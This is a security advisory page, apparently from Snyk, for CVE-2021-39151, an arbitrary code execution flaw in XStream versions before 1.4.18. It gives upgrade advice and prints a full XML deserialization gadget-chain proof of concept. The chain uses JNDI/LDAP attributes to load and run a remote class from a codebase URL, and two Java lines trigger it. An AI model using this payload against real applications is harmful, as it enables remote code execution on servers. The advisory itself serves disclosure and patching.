Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream package, versions [,1.4.18)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
3.02% (92nd
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179
- published 24 Aug 2021
- disclosed 24 Aug 2021
- credit Smi1e
Introduced: 24 Aug 2021
CVE-2021-39151 Open this link in a new tabHow to fix?
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<javax.swing.event.EventListenerList serialization='custom'>
<javax.swing.event.EventListenerList>
<default>
<listenerList>
<javax.swing.undo.UndoManager>
<hasBeenDone>true</hasBeenDone>
<alive>true</alive>
<inProgress>true</inProgress>
<edits>
<com.sun.xml.internal.ws.api.message.Packet>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
<cleaned>false</cleaned>
<entries>
<com.sun.jndi.ldap.LdapEntry>
<DN>cn=four,cn=three,cn=two,cn=one</DN>
<attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ignoreCase>false</ignoreCase>
</default>
<int>4</int>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>objectClass</attrID>
</default>
<int>1</int>
<string>javanamingreference</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class='com.sun.jndi.ldap.LdapName' serialization='custom'>
<com.sun.jndi.ldap.LdapName>
<string>cn=four,cn=three,cn=two,cn=one</string>
<boolean>false</boolean>
</com.sun.jndi.ldap.LdapName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaCodeBase</attrID>
</default>
<int>1</int>
<string>http://127.0.0.1:8080/</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaClassName</attrID>
</default>
<int>1</int>
<string>refObj</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaFactory</attrID>
</default>
<int>1</int>
<string>ExecTemplateJDK7</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default/>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
</javax.naming.directory.BasicAttribute>
</attributes>
</com.sun.jndi.ldap.LdapEntry>
</entries>
<limit>2</limit>
<posn>0</posn>
<homeCtx/>
<more>true</more>
<hasMoreCalled>true</hasMoreCalled>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</com.sun.xml.internal.ws.api.message.Packet>
</edits>
<indexOfNextAdd>0</indexOfNextAdd>
<limit>100</limit>
</javax.swing.undo.UndoManager>
</listenerList>
</default>
<string>java.lang.InternalError</string>
<javax.swing.undo.UndoManager reference='../default/listenerList/javax.swing.undo.UndoManager'/>
<null/>
</javax.swing.event.EventListenerList>
</javax.swing.event.EventListenerList>
XStream xstream = new XStream();
xstream.fromXML(xml);
References
CVSS Scores
version 3.1